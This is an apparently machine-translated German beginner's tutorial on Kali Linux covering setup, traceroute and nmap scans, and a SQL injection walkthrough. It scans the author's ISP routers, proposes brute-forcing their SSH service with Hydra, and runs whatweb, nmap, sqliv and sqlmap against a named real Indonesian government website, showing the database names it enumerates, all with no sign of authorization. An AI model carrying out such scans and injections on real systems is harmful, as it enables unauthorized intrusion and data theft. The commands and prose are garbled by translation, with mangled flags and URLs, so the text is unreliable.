Kali Linux Tutorial

Kali Linux Tutorial
Wenn Sie ein Experte sind oder zumindest mit Linux, Befehlen und Umgebung vertraut sind, nur Kali Linux auf Ihrer Maschine installiert haben, wollte Sie ein Meister von Kali Linux oder ein ethischer Hacker werden, dann sind Sie am richtigen Ort. In diesem Artikel werde ich ein Kali -Linux -Tutorial für Linux -Benutzer behandeln, die mit Kali noch nicht vertraut sind und Sie mit einigen der grundlegenden Techniken für Hacking- und Sicherheitstests bei der Verwendung von Kali beginnen können.

Hallo, ich bin Bimando, der Autor dieses Artikels. Wenn Ihnen dieser Artikel gefällt. Ich habe hart daran mit dem Linux -Hint -Team gearbeitet, um ein hochwertiges Produkt zu produzieren, von dem Sie wissen, dass Sie es lieben und viel lernen werden.


Was ist Kali Linux?

Kali Linux, (Erstes am 13. März 2013 veröffentlicht) Das wurde offiziell als Backtrack bezeichnet, das vom Sicherheitsunternehmen der Sicherheitsunternehmen entwickelt wurde. Kali Linux ist mit dem Penetrationstest, der Datenwiederherstellung und der Erkennung von Bedrohungen ausgelegt. Das Projekt wechselte Anfang dieses Jahres auf ein Rent -Release -Modell um, um den Benutzern der Verteilung mehr auf aktuelle Sicherheitsversorgungsunternehmen zu verleihen. Kali Linux ist kostenlos und wird es immer sein. Es enthält über 600 Penetrationstest -Tools.

Warum Kali Linux? Ist es richtig für dich??

Kali Linux hat in letzter Zeit viel Popularität gewonnen. Und dahinter gibt es einen Grund. Hacking ist als Cool-thing-to-Do in der Populärkultur zurück und dies kann erheblich auf die TV-Serie MR zurückgeführt werden. Roboter. Herr. Die Popularität von Roboter half Kali Linux, neue Benutzer zu bekommen. Menschen mit kaum Kenntnis von Linux oder irgendetwas, das mit der Computersicherheit zusammenhängt, versuchen nun, Kali als Haupt -Linux -Verteilung zu verwenden.

„Unsere fortschrittlichste Verteilung der Penetrationstests aller Zeiten.” - Kali Linux -Entwickler. (Es ist auf der Hauptseite von Kali geschrieben.Org ganz oben auf der Seite.) Was erhalten Sie von dieser Aussage?? Bemerken Sie dies: APTD (Verteilung für erweiterte Penetrationstests)? Hier gibt es hier wörtlich kein Begriff Hacking. Kali Linux ist das gleiche wie bei anderen Linux -Verteilungen. Einfach gesagt, es handelt sich um eine Linux-Verteilung, die mit Sicherheits-Tools gepackt und auf Netzwerk- und Computersicherheitsexperten abzielt. Die Verwendung von Kali Linux konzentriert sich jedoch nur auf Sicherheit und Forensik.

Eine Linux -Verteilung ist nichts anderes als ein Bundle, das den Linux -Kernel enthält. Kali Linux bietet also in diesem Sinne nicht etwas Einzigartiges an.

Kali Linux ist speziell darauf ausgerichtet. Es richtet sich an eine bestimmte Untergruppe von Linux -Benutzern. Pentesters, Hacker usw. Es ist keine empfohlene Verteilung, wenn Sie Kali für den allgemeinen Linux-Desktop für Entwicklung, Webdesign, Spiele, Büro usw. erwarten. Kali könnte Ihnen einige Herausforderungen geben, auch wenn Sie ein erfahrener Linux -Benutzer sind.

Dinge zu tun nach der Installation von Kali Linux

Nachdem Sie Kali Linux installiert haben, fragen Sie sich vielleicht, was Sie als nächstes tun sollen, richtig?. Jeder steht vor diesem Problem, mach dir keine Sorgen.

Schritt 1: Richten Sie das Repository ein

Erstens wissen Sie dies vielleicht bereits, aber es ist wichtig, das Repository korrekt festzulegen. Wie gesagt, das Kali Linux Rolling Release -Modell ist in dem Versuch, den Benutzern der Verteilung mehr auf aktuelle Sicherheitsdienstleistungen zur Verfügung zu stellen. Wenn Sie Kali Linux frisch installiert haben. Um dies zu beheben, müssen Sie das Repository in das offizielle Kali -Linux -Repository ändern. Die erforderliche Datei befindet sich unter /etc/Apt/Quellen.Liste. Öffnen Sie die Datei mit Leafpad -Texteditor und ersetzen Sie das Standard -Repository in dieses offizielle Kali -Rolling -Repository:

Deb http: // http.Kali.org/kali kali-rolling main-Beitrag nicht frei
# Für den Zugang zum Quellpaket die folgende Zeile für den Zugriff auf den Quellpaket in Kenntnis nehmen
# Deb-Src http: // http.Kali.org/kali kali-rolling main-Beitrag nicht frei

Schritt 2: Aktualisieren und aktualisieren Sie Ihre Kali Linux

Synchronisieren Sie Ihre Kali -Linux nach diesem Update und aktualisieren Sie Ihr System mit der neuesten Version. Um das zu tun, öffnen Sie das Terminal und geben Sie an:

APT UPDATE -Y && APT Upgrade -y && Apt Dist -Upgrade

Der Befehl „APT -Update“ lädt das Paket herunter und holt die Informationen aus den Repositorys auf und "Aktualisierung", um Informationen zu den neuesten Versionen von Paketen und deren Abhängigkeiten zu erhalten.

Der Befehl „APT -Upgrade“ lädt und installiert eine neuere Version der Pakete von installierten Kali Linux -Paketen, solange es keine Fehler in Abhängigkeiten hat.

Das "APT Dist-Upgrade" wird alle Pakete auf die neueste verfügbare Version aktualisieren, unabhängig davon, was was ist. Und installieren und entfernen Sie auch Abhängigkeiten nach Bedarf (Installieren Sie Abhängigkeiten, um Pakete offensichtlich zu erfüllen, aber auch Abhängigkeiten, die verwaist wurden, wenn ein Paket, das aktualisiert wurde, die Abhängigkeit nicht mehr benötigte.

Basis -Penetrationstestkonzept mit Kali Linux

Nachdem Sie diese Schritte erfolgreich durchgeführt haben, gibt es drei wichtigste Dinge, die Sie mit Kali Linux tun könnten, basierend auf dem gezielten System, einschließlich:

  1. Drahtloses Netzwerkhacking - WiFi -Hacking, Phising, ARP -Vergiftung usw.
  2. Web -Apps Hacking - SQL Injection, Cross-Site-Anforderungserie (CSRF), Web-Phising usw.
  3. Gerätehacking - Nutzen Sie die Zielmaschine, um die Kontrolle darüber zu erhalten.

Ich schließe IoT -Hacking nicht ein, das heißt nicht, dass Kali Linux für diesen Zweck keine Fähigkeit hat. Aber buchstäblich könnte es auch zum Gerätehacking gehören. Da das Gerät physikalisches Aussehen und Form hat. In diesem Tutorial habe ich das Grundwissen von ihnen behandelt. Da Kali Linux riesig ist, passt es nicht in einen Artikel!

Sie müssen auch den Penetrationstestzyklus oder -verfahren wissen. Sie sind:

  1. Aufklärung - Informationssammlung
  2. Scannen
  3. Ausbeutung
  4. Nachauszug

Kabelloses Netzwerkhacking mit Kali Linux

In Bezug auf das Hacking des drahtlosen Netzwerks kann das Opfer variieren. Weil drahtlose Netzwerke aus verschiedenen Dingen bestehen, wie z. Sie haben auch gefährdete Möglichkeiten.

Das Internet ist eine große und komplexe Aggregation von Netzwerkhardware, die von Gateways miteinander verbunden ist. Das Verfolgen der Route, die Ihre Pakete folgen, ist wichtig zu wissen, wie Sie einen bestimmten Hostnamen oder eine Ziel -IP -Adresse erreichen.

Kali Linux verfügt über ein integriertes Werkzeug namens Traceroute. Traceroute nutzt das Feld IP -Protokoll „Zeit zum Leben“ und versucht, eine ICMP -Reaktion von jedem Gateway entlang des Pfades zu einem Host zu ermitteln. Traceroute versucht, die Route zu verfolgen. Ein IP -Paket würde zu einem Internet -Host folgen, indem er Sondenpakete mit einem kleinen TTL (Zeit zum Live) startet und dann nach einer ICMP -Antwort von einem Gateway nach einer ICMP -Antwort hört. Ich werde Ihnen und Beispiel geben, wie Sie einen ISP -Router verfolgen, der verwendet wird, um unsere Verbindung mit Traceroute zu behandeln.

1. Aufklärung

Das Sammeln von Informationen ist der wichtigste Sprungstart. Verpassen Sie diesen Schritt nicht. In diesem Schritt ist es unser Ziel, so viel wie möglich nützliche Informationen zu erhalten, die wir erhalten können, und dann werden diese Informationen für weitere Schritte verwendet.

Öffnen Sie zunächst einen Terminal und geben Sie diesen Befehl ein, um die „Straße“ auf der Website zu verfolgen. In diesem Fall habe ich die Website auf Google festgelegt.com.

Traceroute Google.com

2. Scannen

Sobald wir die Befehle gestartet haben, werden sie aufgeführt, wo unser Paket nacheinander führt. Wie Sie oben sehen können, habe ich 3 Hops, die einer von ihnen mein ISP -Server ist. Die erste IP auf der Liste ist mein Router, der als Gateway fungiert. Und die nächsten beiden gehören zu meinem ISP. Lassen Sie uns nun den Dienst überprüfen, den sie mit NMAP ausführen. Die Ziele, die wir scannen, sind also 10.152.192.1 Und 10.13.223.102. Im Terminal habe ich den folgenden Befehl ausgeführt:

nmap -v -SS [IP -Ziel] -pn

Lassen Sie uns das Argument des Befehls aufschlüsseln:

-v = Aktivmodus aktivieren

-SS = TCP -Syn -Scan -Technik verwenden

-PN = Behandle alle Hosts als Online - Überspringen Sie die Entdeckung des Hosts überspringen

Und hier ist das Ergebnis, das wir bekommen haben.

Leider alle Ports auf 10.152.192.1 werden gefiltert, dies bedeutet, dass alle eingehenden TCP -Verbindungen durch IDs oder Firewall auf dieser IP blockiert werden. Lassen Sie uns nun einen weiteren Scan zum zweiten Ziel nehmen.

3. Ausbeutung

In diesem Verfahren soll ich nicht die wirkliche Ausbeutung durchführen, stattdessen zeige ich Ihnen, wie. Basierend auf dem oben genannten NMAP -Scan -Ergebnis wissen wir, dass diese IP -Server auf Port 22 ausgeführt wird, und es ist geöffnet. Es ist geöffnet, brutestrocknet zu sein, haha! Wir haben das Loch gefunden, dieser SSH -Server ist das mögliche Loch, auf das wir versuchen könnten, Zugriff zu erhalten. In Kali Linux gibt es mehrere Werkzeuge, die Bruteforce- oder Wörterbuchangriffe gegen das SSH -Protokoll unterstützen. Der beliebteste und mächtigste ist „Hydra“.

OK, das war ein grundlegender Verfahren, der einen Penetrationstest gegen einen gezielten Server durchführte, der in unserem Beispiel hier mein ISP -Server ist.

Web -Apps hacken mit Kali Linux

Wenn Sie sich dafür leidenschaftlich leiden. Es handelt. Seine Hauptziele sind es, Sicherheitsexperten zu helfen, um ihre Fähigkeiten und Tools in einer rechtlichen Umgebung zu testen und Webentwicklern zu helfen, die Prozesse der Sicherung von Webanwendungen besser zu verstehen. Sie können DWVA hier kostenlos auf GitHub erhalten: https: // github.com/Ethicalhack3r/dvwa.

Im Moment werde ich Ihnen zeigen, wie Sie Web -Apps auf einer echten Website hacken. Aber versprich mir, dass es nur auf Bildungszwecke beschränkt ist. Wir werden einen echten Angriff auf die reale Website mithilfe der SQL -Injektion simulieren.

Voraussetzung

Werkzeuge abgedeckt:

- WhatWeb (vorinstalliert)

- NMAP (vorinstalliert)

- SQLIV (manuell installieren)

- SQLMAP (vorinstalliert)

Wir brauchen ein weiteres zusätzliches Tool, das hier auf GitHub verfügbar ist: https: // github.com/hadesy2k/sqliv, installieren Sie es zuerst an unserem Kali Linux. Dieses Tool namens SQLIV, das durch Bereitstellung einer spezifischen Domäne (mit Kriechen) gezielte Scannen durchführen kann, durchzuführen. Geben Sie das Terminal ein:

Git -Klon https: // github.com/hadesy2k/sqliv.Git
CD SQLIV && sudo python2 setup.py -i

Ziel: www.TRENGGALEKKAB.gehen.Ausweis

1. Aufklärung

Sammeln Sie so viel nützliche Informationen, wie wir es bekommen konnten. Wir könnten die Webseite öffnen und erkennen, welche Anwendung auf dieser Website ausgeführt wird. Lassen Sie uns zunächst überprüfen, welche Art von Website es ist. Wir werden „Whatweb“ verwenden, um das zu tun.

Whatweb www.TRENGGALEKKAB.gehen.Ausweis

Wie Sie das Ergebnis oben sehen können, befindet sich das Ziel in Indonesien. Es läuft Apache v2.2.27 auf seinem Webserver und hat auch PHP V5.4.31, Es hat eine IP -Adresse 103.247.21.142. Okay, notieren Sie sich das. Möglicherweise müssen Sie die Webseite besuchen, nach der Datei oder der Seite konstruierten, URL -Parameter oder sogar Anmeldebildform suchen. Im Moment benötigen wir diese IP -Adresse für den nächsten Schritt, der scannt wird.

2. Scannen

Wie zuvor verwenden wir NMAP erneut, um zu scannen, welche Ports und Dienste auf dem Ziel ausgeführt werden.

nmap -v -ss 103.247.21.142

Und hier ist das Ergebnis, das wir erhalten haben:

Abgeschlossener Syn -Stealth -Scan um 21:22, 261.93S verstrichen (1000 Gesamtanschlüsse)
NMAP-Scanbericht für IP-103-247-21-142.Wifian.Netz.ID (103.247.21.142)
Host ist auf (0.069S Latenz).
Nicht gezeigt: 985 geschlossene Ports
Port State Service
21/TCP Open FTP
25/TCP Open SMTP
53/TCP Open Domain
80/TCP Open HTTP
110/TCP Open Pop3
111/TCP Open RPCBind
143/TCP Open IMAP
212/TCP Open Anet
443/TCP Open HTTPS
465/TCP Open SMTPS
587/TCP Offene Einreichung
993/TCP Open IMAPs
995/TCP Open Pop3s
3128/TCP gefilterte Tintenhilfen-HTTP
3306/TCP Open MySQL

Es gibt eine Reihe von offenen Ports, die jeden Dienst auf dem Ziel verarbeiten, aber diejenige, die „auffällig“ aussieht, ist, dass MySQL-Dienst auf Port 3306 Service. Es wird angegeben, dass diese Site verwendet Mysql Um ihre Informationen in Datenbanken zu verwalten. Dann frage ich mich, ob auf dieser Website SQL -Injektionsanfälligkeiten auf dieser Website vorhanden sind. Also scanne ich die Site erneut mit SQLIV, die wir gerade installiert haben. Ich habe den Befehl getippt:

Sqliv -t www.TRENGGALEKKAB.gehen.Ausweis

Wir fanden 2 mögliche SQL -schutzbedürftige URLs auf dieser Website. Notieren Sie sich diese URLs.

3. Ausbeutung

OK, wir haben SQL verletzliche URLs und bereit für die Ausführung. Zu diesem Zweck werden wir SQLMAP verwenden. Die Syntax ist:

SQLMAP "[Verletzliche URL]" -DBS

Der Befehl sollte so aussehen:

sqlmap -u "http: // www.TRENGGALEKKAB.gehen.ID/Berita.Php?Seite = 208 " -DBS

Das Argument „-dbs“ besteht darin, SQLMAP zu sagen, dass sie Zieldatenbanken erhalten sollen. Hier ist die Ausgabe, die wir erhalten haben:

[Info] Das Back-End-DBMS ist MySQL
Webanwendungstechnologie: Php 5.4.31, Apache 2.2.27
Back-End-DBMS: MySQL 5
[21:46:04] [Info] Datenbanknamen abrufen
[21:46:04] [Info] Die verwendete SQL -Abfrage gibt 2 Einträge zurück
[21:46:04] [Info] Wiederaufgenommen: Information_Schema
[21:46:04] [info] wieder aufgenommen: trengkab_trg
Verfügbare Datenbanken [2]:
[*] Information_schema
[*] TRENGKAB_TRG

SQLMAP hat 2 Datenbanken gefunden, jedoch nur eines von ihnen, das sensible Daten enthält, z. Das ist auf "trengkab_trg". Nachdem wir die Datenbanken gefunden haben, sollten wir noch einen weiteren Schritt machen, den wir machen sollten. Das heißt, die Tabellen und Spalten zu finden, und der letzte Schritt besteht darin, die Daten abzugeben. Ich werde Ihnen nicht zeigen, wie hier in diesem Abschnitt dieses Ziel verwendet wird. Zumindest kennen Sie die Grundidee im Angriffszyklus und verwenden einige Tools.

Gerätehacking

In einem zukünftigen Artikel auf dieser Website werden wir das Gerätehacking abdecken, dran bleiben. Als Vorwartung möchten Sie sicherstellen, dass Sie dafür etwas Python kennen.